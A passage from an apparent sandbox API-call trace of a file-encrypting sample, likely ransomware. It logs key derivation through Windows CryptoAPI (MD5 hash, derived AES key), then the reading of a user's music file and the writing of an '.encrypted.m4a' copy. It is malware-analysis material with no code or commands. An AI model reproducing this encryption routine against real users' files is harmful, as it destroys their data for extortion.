wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.069] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.069] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.069] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.070] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x253ef3a0, ftLastWriteTime.dwHighDateTime=0x1d5c0d4, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 0x7c2240 [0039.070] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.070] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.070] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.070] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0039.071] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.071] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.071] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.071] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.072] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.072] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.072] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.072] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.072] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0039.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.072] CryptDestroyHash (hHash=0x7c2100) returned 1 [0039.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\thua2jefihtofcp.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.073] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.073] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.073] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.075] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc")) returned 0x10 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\thua2jefihtofcp.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.077] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.077] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xd484, lpOverlapped=0x0) returned 1 [0039.079] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd484) returned 0xac0018 [0039.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd484) returned 0xacd4a8 [0039.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.080] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd484) returned 0xac0018 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.081] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd484) returned 0xac0018 [0039.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0039.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0039.082] RtlAllocateHeap 